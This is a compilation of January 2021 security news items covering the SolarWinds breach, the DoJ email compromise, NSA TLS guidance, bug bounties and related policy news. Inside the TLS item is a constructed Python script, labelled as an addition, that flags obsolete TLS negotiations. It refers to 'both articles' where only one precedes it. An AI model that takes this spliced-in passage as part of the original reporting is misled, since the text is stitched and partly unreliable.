JetBrains is a software development company based in the Czech Republic. The firm has offices in Europe, Russia and the United States, and it claims that its solutions are used by over 9 million developers across 300,000 companies around the world, including 95 of the Fortune 100 companies and 79 Fortune Global 100 companies.
In a statement issued in response to the New York Times article, JetBrains CEO Maxim Shafirov said his company was not aware of any investigations into its software’s role in the SolarWinds breach, but noted that they are prepared to cooperate.
According to reports, the JetBrains product possibly abused by the SolarWinds hackers is TeamCity, a continuous integration and development system. Shafirov has confirmed that SolarWinds is a customer.
“It’s important to stress that TeamCity is a complex product that requires proper configuration. If TeamCity has somehow been used in this process, it could very well be due to misconfiguration, and not a specific vulnerability,” Shafirov said, pointing to a section of the JetBrains website where they regularly inform customers about the vulnerabilities patched in products.
The New York Times reported that SolarWinds has yet to confirm a definitive connection between TeamCity and the attack targeting its systems.
It’s worth pointing out that the attack on SolarWinds is believed to have started at least one year prior to its discovery, and it’s possible that SolarWinds has also been targeted by a second, unrelated threat actor.
The United States has officially said that the attack on SolarWinds was likely conducted by Russia, an accusation that Moscow has denied.
The breach, which involved the delivery of trojanized updates for SolarWinds’ Orion product, is believed to have allowed the attackers to breach the networks of at least 250 government and private organizations. The latest government organization to admit being hit is the U.S. Justice Department, which said on Wednesday that three percent of its Microsoft 365 email accounts were potentially affected, but claimed there was no evidence that classified systems were impacted.
NSA Urges SysAdmins to Replace Obsolete TLS Protocols
7.1.2021 BigBrothers Threatpost
The NSA released new guidance providing system administrators with the tools to update outdated TLS protocols.
The National Security Agency (NSA) is lighting a fire under system administrators who are dragging their feet to replace insecure and outdated Transport Layer Security (TLS) protocol instances.
The agency this week released new guidance and tools to equip companies to update from obsolete older versions of TLS (TLS 1.0 and TLS 1.1) to newer versions of the protocol (TLS 1.2 or TLS 1.3).
TLS (as well as its precursor, Secure Sockets Layer, or SSL) was developed as a protocol aimed to provide a private, secure channel between servers and clients to communicate. However, various new attacks against TLS and the algorithms it uses have been revealed – from Heartbleed to POODLE – rendering the older versions of the protocol insecure.
“The standards and most products have been updated, but implementations often have not kept up,” said the NSA in its guidance this week. “Network connections employing obsolete protocols are at an elevated risk of exploitation by adversaries. As a result, all systems should avoid using obsolete configurations for TLS and SSL protocols.”
The NSA’s alert adds to an existing collective push for updating TLS protocols, with some of the biggest standards bodies and regulators mandating that web server operators ensure they move to TLS 1.2 before the end of 2020. At the same time, many major browsers – including Chrome and Mozilla – have deprecated support for TLS 1.0 and TLS 1.1.
As of March 2020, more than 850,000 websites still used the TLS 1.0 and 1.1 protocols. Meanwhile, according to the SANS ISC in December, TLS 1.3 is supported by about one in every five HTTPS servers, showing steady adoption of the newer protocol version.
“TLSv1.3 is arguably the first TLS protocol version which focused more on security concerns than it did on compatibility issues,” Craig Young, principal security researcher at Tripwire, told Threatpost. “TLSv1.2 and earlier specifications have repeatedly included esoteric workarounds for known attacks rather than deprecating broken technologies. TLSv1.3 introduces new handshake mechanisms and ciphersuites with mandated perfect forward secrecy and authenticated encryption. The overall impact is a strong protection against downgrade attacks and other cryptographic attacks.”
The NSA’s alert, intended for the National Security System (NSS), Department of Defense (DoD), and Defense Industrial Base (DIB) cybersecurity leaders, as well as system administrators and network security analysts, provided further guidance on how to detect and update outdated TLS versions.
Part of the NSA’s recommendations include using network monitoring systems to detect obsolete TLS versions. The NSA also provided further information about prioritization of remediation for obsolete TLS versions.
“Network monitoring devices can be configured to alert analysts to servers and/or clients that negotiate obsolete TLS or can be used to block weak TLS traffic,” according to the NSA. “The choice to alert and/or block will depend on the organization. To minimize mission impact, organizations should use a phased approach to detecting and fixing clients and servers until an acceptable number have been remediated before implementing blocking rules.”
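The detection step the NSA guidance describes (identifying servers and clients that negotiate obsolete TLS versions, weak cipher suites or key-exchange methods without forward secrecy) comes up in both articles on the guidance above. As an added example that is not part of the NSA guidance or of either article, the following Python parses a captured TLS ServerHello record, works out the negotiated version (including the TLS 1.3 supported_versions extension) and cipher suite, and reports findings in the alert-first style the guidance recommends for a phased rollout. The cipher-suite table is a constructed subset of the IANA registry, and the host labels and records are constructed samples rather than real captures.

```python
"""Flag obsolete TLS negotiations from captured ServerHello records (added illustration)."""
import struct

# Constructed subset of the IANA cipher-suite registry: name, key-exchange class, bulk cipher.
CIPHER_SUITES = {
    0x0005: ("TLS_RSA_WITH_RC4_128_SHA", "RSA", "RC4"),
    0x000A: ("TLS_RSA_WITH_3DES_EDE_CBC_SHA", "RSA", "3DES"),
    0x002F: ("TLS_RSA_WITH_AES_128_CBC_SHA", "RSA", "AES-CBC"),
    0x009C: ("TLS_RSA_WITH_AES_128_GCM_SHA256", "RSA", "AES-GCM"),
    0xC02F: ("TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256", "ECDHE", "AES-GCM"),
    0xC030: ("TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384", "ECDHE", "AES-GCM"),
    0x1301: ("TLS_AES_128_GCM_SHA256", "TLS1.3", "AES-GCM"),
    0x1302: ("TLS_AES_256_GCM_SHA384", "TLS1.3", "AES-GCM"),
}
VERSION_NAMES = {0x0300: "SSLv3", 0x0301: "TLSv1.0", 0x0302: "TLSv1.1",
                 0x0303: "TLSv1.2", 0x0304: "TLSv1.3"}
OBSOLETE_VERSIONS = {0x0300, 0x0301, 0x0302}   # SSLv2 uses a different record format, not handled here
WEAK_BULK = {"RC4", "3DES", "NULL"}
SUPPORTED_VERSIONS_EXT = 0x002B


def parse_server_hello(record: bytes) -> dict:
    """Return the negotiated version and cipher suite from a ServerHello record.

    Layout: record header (type 0x16, version, length), handshake header (type 2,
    3-byte length), then server_version, 32-byte random, session_id,
    cipher_suite, compression_method and optional extensions. TLS 1.3 keeps
    server_version at 0x0303 and signals 1.3 through supported_versions.
    """
    if len(record) < 5 or record[0] != 0x16:
        raise ValueError("not a handshake record")
    rec_len = struct.unpack("!H", record[3:5])[0]
    body = record[5:5 + rec_len]
    if len(body) < 4 or body[0] != 0x02:
        raise ValueError("not a ServerHello")
    hs_len = int.from_bytes(body[1:4], "big")
    hello = body[4:4 + hs_len]
    if len(hello) < 2 + 32 + 1:
        raise ValueError("truncated ServerHello")
    version = struct.unpack("!H", hello[0:2])[0]
    pos = 2 + 32
    sid_len = hello[pos]
    pos += 1 + sid_len
    if len(hello) < pos + 3:
        raise ValueError("truncated ServerHello")
    suite = struct.unpack("!H", hello[pos:pos + 2])[0]
    pos += 3  # cipher_suite (2) + compression_method (1)
    if len(hello) >= pos + 2:  # extensions block present
        ext_len = struct.unpack("!H", hello[pos:pos + 2])[0]
        pos += 2
        end = pos + ext_len
        while pos + 4 <= end:
            ext_type, ext_size = struct.unpack("!HH", hello[pos:pos + 4])
            pos += 4
            if ext_type == SUPPORTED_VERSIONS_EXT and ext_size == 2:
                version = struct.unpack("!H", hello[pos:pos + 2])[0]
            pos += ext_size
    return {"version": version, "cipher_suite": suite}


def assess(hello: dict) -> list:
    """List findings for one negotiation; an empty list means it looks acceptable."""
    findings = []
    v = hello["version"]
    if v in OBSOLETE_VERSIONS:
        findings.append(f"obsolete protocol version {VERSION_NAMES.get(v, hex(v))}")
    name, kx, bulk = CIPHER_SUITES.get(hello["cipher_suite"], ("unknown", "?", "?"))
    if name == "unknown":
        findings.append(f"unrecognised cipher suite {hello['cipher_suite']:#06x}")
    if bulk in WEAK_BULK:
        findings.append(f"weak bulk cipher {bulk} ({name})")
    if kx == "RSA":
        findings.append(f"static RSA key exchange, no forward secrecy ({name})")
    return findings


def build_server_hello(version: int, suite: int, supported_version: int = None) -> bytes:
    """Construct a minimal ServerHello record for the constructed samples below."""
    hello = struct.pack("!H", version) + b"\x00" * 32 + b"\x00"  # random, empty session id
    hello += struct.pack("!HB", suite, 0)
    if supported_version is not None:
        ext = struct.pack("!HHH", SUPPORTED_VERSIONS_EXT, 2, supported_version)
        hello += struct.pack("!H", len(ext)) + ext
    handshake = b"\x02" + len(hello).to_bytes(3, "big") + hello
    return b"\x16" + struct.pack("!HH", version, len(handshake)) + handshake


# Constructed samples standing in for ServerHello records taken from a network tap.
SAMPLES = {
    "legacy-app": build_server_hello(0x0301, 0x000A),
    "payment-gw": build_server_hello(0x0303, 0x009C),
    "web-frontend": build_server_hello(0x0303, 0xC02F),
    "api-edge": build_server_hello(0x0303, 0x1301, supported_version=0x0304),
}


def triage(samples: dict) -> dict:
    """Map each host label to its findings, the input for an alert-before-block rollout."""
    return {host: assess(parse_server_hello(rec)) for host, rec in samples.items()}


if __name__ == "__main__":
    for host, findings in triage(SAMPLES).items():
        print(host, "OK" if not findings else "; ".join(findings))
```

Run it to get one line per host; a monitoring pipeline would feed real ServerHello records from a capture into `triage` and raise alerts first, then convert the findings into blocking rules once the remediated share is acceptable. Reading the version from the ServerHello rather than the record header matters because a TLS 1.3 server advertises 0x0303 in both header fields and announces 1.3 only in the extension.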
Security-focused content delivery network provider Cloudflare has previously stated that “both TLS 1.0 and TLS 1.1 are insufficient for protecting information due to known vulnerabilities. Specifically for Cloudflare customers, the primary impact of PCI is that TLS 1.0 and TLS 1.1 are insufficient to secure payment card related traffic.”
Cloudflare did not respond to a request for comment from Threatpost.
“There really is no reason for organizations to delay in deploying TLSv1.3 in 2021, but some organizations may be hesitant because of the potential impact on SSL/TLS inspection systems,” Young told Threatpost. “This is a potential problem because these products often work by intercepting TLS connections and TLSv1.3 has been designed to guard against this.”
SolarWinds hackers had access to roughly 3% of US DOJ O365 mailboxes
7.1.2021 BigBrothers Securityaffairs
The US DoJ revealed that threat actors behind the SolarWinds attack have gained access to roughly 3% of the department’s O365 mailboxes.
The US Department of Justice (DoJ) published a press release to confirm that the threat actors behind the SolarWinds supply chain attack were able to access thousands of mailboxes of its employees.
“On Dec. 24, 2020, the Department of Justice’s Office of the Chief Information Officer (OCIO) learned of previously unknown malicious activity linked to the global SolarWinds incident that has affected multiple federal agencies and technology contractors, among others. This activity involved access to the Department’s Microsoft O365 email environment.” reads the update provided by the DoJ on the SolarWinds attack.
“After learning of the malicious activity, the OCIO eliminated the identified method by which the actor was accessing the O365 email environment. At this point, the number of potentially accessed O365 mailboxes appears limited to around 3-percent and we have no indication that any classified systems were impacted.”
The DoJ confirmed that the number of potentially accessed O365 mailboxes is around 3 percent; it also added that government experts are not aware of any impacted classified systems.
Considering that the DoJ has around 115,000 employees, this implies that the attackers gained access to roughly 3,450 mailboxes. The DoJ said it has locked out the intruders.
“As part of the ongoing technical analysis, the Department has determined that the activity constitutes a major incident under the Federal Information Security Modernization Act, and is taking the steps consistent with that determination. The Department will continue to notify the appropriate federal agencies, Congress, and the public as warranted,” concludes the press release.
The US agencies FBI, CISA, ODNI, and the NSA released a joint statement that blames Russia for the SolarWinds supply chain attack.
On behalf of President Trump, the four agencies were part of the task force Cyber Unified Coordination Group (UCG) that is coordinating the investigation and remediation of the SolarWinds hack that had a significant impact on federal government networks. The UCG’s investigation is still ongoing to determine the scope of the incident.
According to the UCG’s statement, the attack was orchestrated by an Advanced Persistent Threat (APT) actor, likely Russian in origin.
Recently the US Cybersecurity and Infrastructure Security Agency (CISA) has updated its official guidance to order US federal agencies to update the SolarWinds Orion platforms by the end of the year.
Justice Department Says It's Been Affected by Russian Hack
7.1.2021 BigBrothers Securityweek
The Justice Department disclosed on Wednesday that it was among the federal agencies harmed by a massive breach of government networks that U.S. officials have linked to Russia.
The extent of the damage was unclear. The department said that 3% of its Microsoft Office 365 email accounts were potentially affected, but did not say to whom those accounts belonged. There are no indications that classified systems were affected, the agency said.
The department said it detected on Dec. 24 “previously unknown malicious activity” linked to the broader intrusions of federal agencies revealed earlier that month, according to a statement from spokesman Marc Raimondi.
The statement came one day after federal law enforcement and intelligence agencies formally implicated Russia in the intrusions, which officials said were part of a suspected intelligence gathering operation. President Donald Trump had previously raised without evidence the idea that China could be to blame.
The hacking campaign was extraordinary in scale, with the intruders having stalked through government agencies, defense contractors and telecommunications companies for months by the time the breach was discovered. Experts say that gave the foreign agents ample time to collect data that could be highly damaging to U.S. national security, though the scope of the breaches and exactly what information was sought is unknown.
An estimated 18,000 organizations were affected by malicious code that piggybacked on popular network-management software from an Austin, Texas, company called SolarWinds. Of those customers, though, “a much smaller number has been compromised by follow-on activity on their systems,” the statement said, noting that fewer than 10 federal government agencies have so far been identified as falling into that category.
U.S. Government Announces 'Hack the Army 3.0' Bug Bounty Program
7.1.2021 BigBrothers Securityweek
The U.S. government on Wednesday announced the launch of another bug bounty program conducted in collaboration with hacker-powered cybersecurity platform HackerOne.
Hack the Army 3.0, whose goal is to help the U.S. Army secure its digital assets and protect its systems against cyberattacks, takes place between January 6 and February 17, and it’s open to both military and civilian white hat hackers. However, only civilians are eligible for financial rewards if they find vulnerabilities.
The program, conducted by the Defense Digital Service (DDS), is invitation-only, so not everyone can participate, but the Department of Defense does have an ongoing vulnerability disclosure program through which anyone can report security holes at any time in exchange for “thanks.”
“Bug bounty programs are a unique and effective 'force multiplier' for safeguarding critical Army networks, systems and data, and build on the efforts of our Army and DoD security professionals,” said Brig. Gen. Adam C. Volant, who is the director of operations at the U.S. Army Cyber Command. “By 'crowdsourcing' solutions with the help of the world's best military and civilian ethical hackers, we complement our existing security measures and provide an additional means to identify and fix vulnerabilities. Hack the Army 3.0 builds upon the successes and lessons of our prior bug bounty programs.”
The DDS has conducted 14 public bug bounties covering public-facing websites and apps, and 10 private programs covering internal assets. In the previous Hack the Army program, which ran in October and November 2019, the government paid out $275,000 in rewards for 146 valid vulnerabilities.
The Pentagon also paid out $290,000 last year for more than 400 vulnerabilities as part of its Hack the Air Force 4.0 program.
The Defense Department’s first bug bounty program was announced in 2016 and the initiatives launched since have resulted in the patching of thousands of vulnerabilities and millions of dollars being paid out.
SolarWinds Hackers Also Accessed U.S. Justice Department's Email Server
7.1.2021 BigBrothers Thehackernews
The U.S. Department of Justice on Wednesday became the latest government agency in the country to admit its internal network was compromised as part of the SolarWinds supply chain attack.
"On December 24, 2020, the Department of Justice's Office of the Chief Information Officer (OCIO) learned of previously unknown malicious activity linked to the global SolarWinds incident that has affected multiple federal agencies and technology contractors, among others," DoJ spokesperson Marc Raimondi said in a short statement. "This activity involved access to the Department's Microsoft Office 365 email environment."
Calling it a "major incident," the DoJ said the threat actors who spied on government networks through SolarWinds software potentially accessed about 3% of the Justice Department's email accounts, but added there's no indication they accessed classified systems.
The disclosure comes a day after the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Office of the Director of National Intelligence (ODNI), and the National Security Agency (NSA) issued a joint statement formally accusing an adversary "likely Russian in origin" for staging the SolarWinds hack.
The agencies described the entire SolarWinds operation as "an intelligence gathering effort."
The espionage campaign, which originated in March 2020, worked by delivering malicious code that piggybacked on SolarWinds network-management software to as many as 18,000 of its customers, although additional intrusive activity is believed to have been conducted only against select targets.
In a separate development, The New York Times, Reuters, and The Wall Street Journal reported intelligence bureaus are probing the possibility that JetBrains' TeamCity software distribution system was breached and "used as a pathway for hackers to insert back doors into the software of an untold number of technology companies."
TeamCity is a build management and continuous integration server offered by the Czech software development company. JetBrains counts 79 of the Fortune 100 companies as its customers, including SolarWinds.
But in a blog post published by its CEO Maxim Shafirov, the company denied being involved in the attack in any way, or that it was contacted by any government or security agency regarding its role in the security incident.
"SolarWinds is one of our customers and uses TeamCity, which is a Continuous Integration and Deployment System, used as part of building software," Shafirov said. "SolarWinds has not contacted us with any details regarding the breach and the only information we have is what has been made publicly available."
Shafirov also stressed that in the event that TeamCity had been used to compromise SolarWinds, it could be due to a misconfiguration, and not a specific vulnerability.
FBI, CISA, ODNI and NSA blame Russia for SolarWinds hack
6.1.2021 BigBrothers Securityaffairs
A joint statement issued by US security agencies confirmed that Russia was likely the origin of the SolarWinds supply chain attack.
The US agencies FBI, CISA, ODNI, and the NSA released a joint statement that blames Russia for the SolarWinds supply chain attack.
On behalf of President Trump, the four agencies were part of the task force Cyber Unified Coordination Group (UCG) that is coordinating the investigation and remediation of the SolarWinds hack that had a significant impact on federal government networks. The UCG’s investigation is still ongoing to determine the scope of the incident.
According to the UCG’s statement, the attack was orchestrated by an Advanced Persistent Threat (APT) actor, likely Russian in origin.
“This work indicates that an Advanced Persistent Threat (APT) actor, likely Russian in origin, is responsible for most or all of the recently discovered, ongoing cyber compromises of both government and non-governmental networks.” reads the statement. “At this time, we believe this was, and continues to be, an intelligence gathering effort.”
The UCG confirmed that approximately 18,000 customers of SolarWinds’ Orion product were impacted, but only a smaller number of them have been compromised. The government experts also identified fewer than ten U.S. government agencies that were impacted.
The statement dismantles President Donald Trump’s claim that the attack was orchestrated by China-linked actors and confirms the report published by the Washington Post that blames the Russia-linked APT29 group.
Recently the US Cybersecurity and Infrastructure Security Agency (CISA) has updated its official guidance to order US federal agencies to update the SolarWinds Orion platforms by the end of the year.
The Russian Government has denied involvement in the hack.
Singapore Admits Police Can Access Contact-Tracing Data
6.1.2021 BigBrothers Securityweek
Singapore has admitted data collected for contact-tracing can be accessed by police despite earlier assurances it would only be used to fight the coronavirus, sparking privacy concerns Tuesday about the scheme.
The city-state has a programme called "TraceTogether" for tracking close contacts of Covid-19 patients, which works via both a phone app and a dongle.
Take-up was initially slow due to privacy worries but rose to almost 80 percent of residents after government assurances and a decision to make its use mandatory for accessing some public places like malls.
However, a senior official admitted in parliament that police could "obtain any data" -- including information gathered through the contact-tracing programme -- in the course of a criminal investigation.
Foreign Minister Vivian Balakrishnan said later that, to his knowledge, police had so far only accessed contact-tracing data on one occasion, during a murder probe.
Human Rights Watch accused the government, which is regularly criticised for curtailing civil liberties, of "undermining the right to privacy".
The admission "exposes how the government has been covertly exploiting the pandemic to deepen its surveillance and control over the population," Phil Robertson, the group's Asia deputy director, told AFP.
Singaporean freelance journalist and activist Kirsten Han said she was disappointed but not surprised.
"Looking at the government's record, I felt that it would be quite predictable that if they can do it, they will," said Han.
"It's unfair and shows how little protection we have for our privacy against the government."
Speaking in parliament Tuesday, Balakrishnan said the government was just being open when it made the admission.
"We want to be completely above board and transparent," he said.
But there was much anger online, with some Singaporeans saying they felt betrayed. The city-state has only suffered a mild outbreak, with about 58,000 cases and 29 deaths.
Many countries have rolled out contact-tracing programmes that work via a smartphone app, but take-up has been low in some due to privacy concerns.
Trump Widens US Ban on Chinese Apps as His Term Nears End
6.1.2021 BigBrothers Securityweek
President Donald Trump has signed an executive order banning transactions with eight Chinese apps including Alipay and WeChat Pay in an escalation of a trade war that has been unfolding through most of his term.
The order, however, goes into effect in 45 days, nearly a month after Joe Biden will be inaugurated as the next president, so the fate of Trump’s action is unclear.
The orders follow two others Trump signed in August banning dealings with the popular video app TikTok as well as the main WeChat messaging app. The fate of those apps in the U.S. is still unclear, and with just 15 days left until Inauguration Day, it will likely fall to Biden to deal with them — or not. The same goes for Tuesday’s executive order.
A representative for Biden’s office did not immediately return a message for comment Tuesday.
Alipay is a widely used digital wallet that is part of the empire of e-commerce billionaire and Ant Group founder Jack Ma. WeChat Pay is a rival service operated by tech giant Tencent. The others named in the order are CamScanner, QQ Wallet, SHAREit, Tencent QQ, VMate and WPS Office.
Trump’s order cites unspecified concerns about the apps collecting Americans’ personal and financial information and turning it over to China’s communist government.
The order marks the Trump administration’s latest attempt to hobble China, a rising economic superpower. Over the past several years, it has lashed out at China with tariffs that have sometimes roiled the U.S. stock market, blocked mergers involving Chinese companies and stifled the business of Chinese firms like Huawei, a maker of phones and telecom equipment.
China-backed hackers, meanwhile, have been blamed for data breaches of U.S. federal databases and the credit agency Equifax, and the Chinese government strictly limits what U.S. tech companies can do in China.
Political analysts expect Biden to try to resume cooperation with Beijing on issues such as climate change and the coronavirus. However, economists and political analysts foresee few big changes due to widespread frustration with Beijing’s trade and human rights record and accusations of spying and technology theft.
But dealing with the fallout from Trump’s latest shot at China could still create more headaches for Biden on top of the ongoing efforts to fight a worsening pandemic after he takes office.
Senior Trump administration officials indicated they hadn’t consulted with the president-elect’s team before issuing the latest effort to ban more China apps. They described the apps as instruments for a communist government bent on “digital totalitarianism.”
When reporters asked why the administration was only taking these steps now with the Trump presidency down to its final two weeks, one official said the executive action should have probably been taken years ago, “but better late than never.” The officials spoke on condition of anonymity because they were not authorized to discuss the executive action publicly.
National Security Adviser Robert C. O’Brien framed the order as part of Trump’s ongoing effort to “prioritize the safety and security of the United States homeland and the American people.”
Trump’s tariffs and orders against China have raised recurring fears among U.S. tech companies and their stockholders that China’s government will retaliate by making it more difficult to do business in the world’s most populous country. If that were to happen, among those that could be particularly hard hit is Apple, which generated $40 billion in sales in China in its last fiscal year — making it the iPhone maker’s third largest market behind the U.S. and Europe.
Despite the worries of a backlash, Apple has emerged largely unscathed from Trump’s battle with China, enabling it to boost its market value above $2 trillion amid the pandemic.
US: Hack of Federal Agencies 'Likely Russian in Origin'
6.1.2021 BigBrothers Securityweek
Top national security agencies in a rare joint statement Tuesday confirmed that Russia was likely responsible for a massive hack of U.S. government departments and corporations, rejecting President Donald Trump’s claim that China might be to blame.
The statement represented the U.S. government’s first formal attempt to assign responsibility for the breaches at multiple agencies and to assign a possible motive for the operation. It said the hacks appeared to be intended for “intelligence-gathering,” suggesting the evidence so far pointed to a Russian spying effort rather than an attempt to damage or disrupt U.S. government operations.
“This is a serious compromise that will require a sustained and dedicated effort to remediate,” said the statement, distributed by a cyber working group comprised of the FBI and other investigative agencies.
The hacking campaign amounts to Washington’s worst cyberespionage failure to date. The intruders had been stalking through government agencies, defense contractors and telecommunications companies for at least seven months when it was discovered. Experts say that gave the foreign agents ample time to collect data that could be highly damaging to U.S. national security, though the scope of the breaches and exactly what information was sought is unknown.
The hacking campaign was extraordinary in its scale — 18,000 organizations were infected earlier this year by malicious code that piggybacked on popular network-management software from an Austin, Texas, company called SolarWinds. Of those 18,000 customers, the statement said, “a much smaller number have been compromised by follow-on activity on their systems,” with fewer than 10 federal government agencies falling into that category.
The Treasury and Commerce departments are among the agencies to have been affected. Sen. Ron Wyden, an Oregon Democrat, said after a briefing last month to the Senate Finance Committee that dozens of email accounts within the Treasury Department had been compromised and that hackers had broken into systems used by the department’s highest-ranking officials.
A senior executive of the cybersecurity firm that discovered the malware, FireEye, said last month that “dozens of incredibly high-value targets” have been infiltrated by elite, state-backed hackers. The executive, Charles Carmakal, would not name the targets. Nor has Microsoft, which says it identified more than 40 compromised government and private targets, most in the U.S.
U.S. officials, including then-Attorney General William Barr and Secretary of State Mike Pompeo, and cybersecurity experts have previously said Russia was to blame. But Trump, in a series of tweets late last month, sought to downplay the severity of the hack and raised the unsubstantiated idea that China could be responsible.
Tuesday’s statement makes clear that is not the case, saying the intrusions are likely “Russian in origin.”
Russia has denied involvement in the hack.
U.S. Releases Cybersecurity Plan for Maritime Sector
6.1.2021 BigBrothers Securityweek
The U.S. government has released a plan with a list of top-priority items to mitigate threats and provide security to the crucial maritime sector.
The National Maritime Cybersecurity Plan, which was made public (PDF) on Tuesday, highlights several priority actions to close maritime cybersecurity gaps and vulnerabilities over the next five years.
The maritime sector, which includes hundreds of thousands of major waterways, shipyards, ports and bridges, contributes about $5.4 trillion to the U.S. gross domestic product.
At a high level, the plan sets out priorities and goals around the establishment of global standards to define maritime threats, beefing up threat intel and information sharing, and increasing the cybersecurity workforce in the maritime sector.
“The proliferation of IT across the maritime sector is introducing previously unknown risks, as evidenced by the June 2017 NotPetya cyber-attack, which crippled the global maritime industry for more than a few days,” the White House said.
“This plan articulates how the United States government can best buy down the potential catastrophic risks to national security and economic prosperity,” the government said, noting that the increasing reliance on IT and OT will continue to promote maritime commerce efficiency and reliability.
The plan calls for a high priority to be placed on what is described as deconflicting government roles and responsibilities.
“Some MTS operators lack the ability to control the security of critical systems because different public and private entities own and operate these interconnected systems. Although cybersecurity standards and frameworks are widely available, businesses often lack the resources or expertise to implement them effectively, leaving them vulnerable to cybersecurity disruptions,” the U.S. government warned.
Because no single entity owns, controls, manages, or regulates businesses or networks used throughout the maritime domain, the plan calls for the NSC (National Security Council) staff to identify gaps in legal authorities and identify efficiencies to de-conflict roles and responsibilities for MTS cybersecurity standards.
The plan's other priorities include developing risk modeling to inform maritime cybersecurity standards and best practices; strengthening cybersecurity requirements in port services contracts and leasing; and improving the level of information sharing between the U.S. government and the private sector.
"Credible and actionable intelligence is required to strengthen maritime cybersecurity,” the government asserted, noting it will create mechanisms to share unclassified, and when acceptable, classified information with maritime industry stakeholders, increasing access to actionable information to protect maritime IT and OT networks.
Furthermore, the plan calls for the creation of an international "port OT risk framework" based on input from partners, which will be promoted internationally.
The plan also zeroes in on producing cybersecurity specialists and a robust workforce to manage and protect port and vessel systems.
"The dual threat of opportunistic ransomware infection and targeted nation state power projection over the past few years has demonstrated the impact of cyber attacks on national security and commercial supply chains," Grant Geyer, Chief Product Officer at industrial cybersecurity firm Claroty, told SecurityWeek. "We saw examples of the potential for massive disruption during the 2017 NotPetya infections in commercial maritime enterprises, and Iran’s revelation that their port activities were disrupted by a cyber attack in 2020."
"Coupling these highly vulnerable OT maritime environments with a severe lack of expertise in OT security," Geyer continued, "creates the potential for massive risk to critical infrastructure. What strikes me as very important about the National Maritime Cybersecurity Plan is the purposeful focus on ensuring risk mitigation to the critical ships and port systems, and the focus on developing expertise and career paths for maritime cybersecurity."
CIA's New Recruitment Website Aims to Diversify Spy Agency
6.1.2021 BigBrothers Securityweek
Striving to further diversify its ranks, the CIA launched a new website Monday to find top-tier candidates who will bring a broader range of life experiences to the nation’s premier intelligence agency.
The days of all American spies being white male graduates from Ivy League schools are long gone. The CIA director is a woman and women head all five of the agency’s branches, including the directorates of science and technology, operations and digital innovation.
But while the CIA has been diversifying for years, intelligence agencies still lag the federal workforce in minority representation. With thousands of job applicants annually, the CIA wants to do more to ensure its workforce reflects national demographics.
The revamped website has links for browsing CIA jobs complete with starting salaries and requirements, sections on working at the agency, and a streamlined application process.
“We’ve come a long way since I applied by simply mailing a letter marked ‘CIA, Washington, D.C.,’” said CIA Director Gina Haspel, who joined the agency in 1985. She said in a statement that she hopes the new website piques the interest of talented Americans and gives them a sense of the “dynamic environment that awaits them here.”
Haspel has made recruitment a priority since she became the first female director in May 2018. Since then, the CIA has started advertising on streaming services, launched an Instagram account and an online “onion site,” a feature that makes both the information provider and the person accessing information more difficult to trace.
Last year, the CIA designated its first executive for Hispanic engagement, Ilka Rodriguez-Diaz, a veteran of more than three decades with the agency. She first joined after attending a CIA job fair in New Jersey.
“The CIA had never been on my radar,” she wrote in an op-ed in The Miami Herald after getting the job in October. “I didn’t think I fit the ‘profile.’ After all, the spies I saw on TV were male Anglo-Saxon Ivy leaguers, not Latinas from New Jersey. Still, I went to my expert life coach, my mother, for advice. She said, ‘No pierdes nada con ir.’ (What have you got to lose in going?) So, I went to the job fair. The rest, as they say, is history.”
Across the more than a dozen U.S. spy agencies, including the CIA, 61% of intelligence professionals in fiscal 2019 were men compared with 39% women, according to an annual demographics report compiled by the Office of the Director of National Intelligence.
In fiscal 2019, the intelligence community saw an incremental increase in the number of minority professionals — 26.5%, up from 26.2%. But that’s still lower than 37% in the federal workforce as a whole and 37.4% in the civilian labor force, the report said.
The largest minority or ethnic group at all the intelligence agencies, including the CIA, was Black or African American at 12% followed by Hispanic at 7% and Asian at 4%. Persons with disabilities represent 11.5% of the workforce at all the U.S. intelligence agencies — up a point from the year before.
“Even with all the challenges 2020 posed, it was a standout recruitment year for CIA. Our incoming class is the third largest in a decade and represents the most diverse talent pool, including persons with disabilities, since 2010,” said CIA spokesperson Nicole de Haay.
A Government Accountability Office report to congressional committees in December said the intelligence community as a whole needs to take additional steps to enhance diversity.
“Over the past several years, the intelligence community has demonstrated its commitment to diversity by taking steps to increase the proportion of women, racial or ethnic minorities and persons with disabilities” within the workforce, the report said. “Although some progress has been made in increasing this representation throughout the intelligence community, representation remains below comparable benchmarks.”
FBI, CISA, NSA Officially Blame Russia for SolarWinds Cyber Attack
6.1.2021 BigBrothers Thehackernews
The U.S. government on Tuesday formally pointed fingers at the Russian government for orchestrating the massive SolarWinds supply chain attack that came to light early last month.
"This work indicates that an Advanced Persistent Threat (APT) actor, likely Russian in origin, is responsible for most or all of the recently discovered, ongoing cyber compromises of both government and non-governmental networks," the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Office of the Director of National Intelligence (ODNI), and the National Security Agency (NSA) said in a joint statement.
Russia, however, denied any involvement in the operation on December 13, stating it "does not conduct offensive operations in the cyber domain."
The FBI, CISA, ODNI, and NSA are members of the Cyber Unified Coordination Group (UCG), a newly-formed task force put in place by the White House National Security Council to investigate and lead the response efforts to remediate the SolarWinds breach.
A Much Smaller Number Compromised
Calling the campaign an "intelligence gathering effort," the intelligence bureaus said they are currently working to understand the full scope of the hack while noting that fewer than 10 U.S. government agencies were impacted by the compromise.
The names of the affected agencies were not disclosed, although previous reports have singled out the U.S. Treasury, Commerce, State, and the Departments of Energy and Homeland Security among those that have detected tainted SolarWinds' network management software installations, not to mention a number of private entities across the world.
An estimated 18,000 SolarWinds customers are said to have downloaded the backdoored software update, but the UCG said only a smaller number had been subjected to "follow-on" intrusive activity on their internal networks.
Microsoft's analysis of the Solorigate modus operandi last month found that the second-stage malware, dubbed Teardrop, has been selectively deployed against targets based on intel amassed during an initial reconnaissance of the victim environment for high-value accounts and assets.
The joint statement also confirms previous speculations that linked the espionage operation to APT29 (or Cozy Bear), a group of state-sponsored hackers associated with the Russian Foreign Intelligence Service (SVR).
The hacking campaign was notable for its scale and stealth, with the attackers leveraging the trust associated with SolarWinds Orion software to spy on government agencies and other companies for at least nine months, including viewing source code and stealing security tools, by the time it was discovered.
SolarWinds Faces Class Action Lawsuit
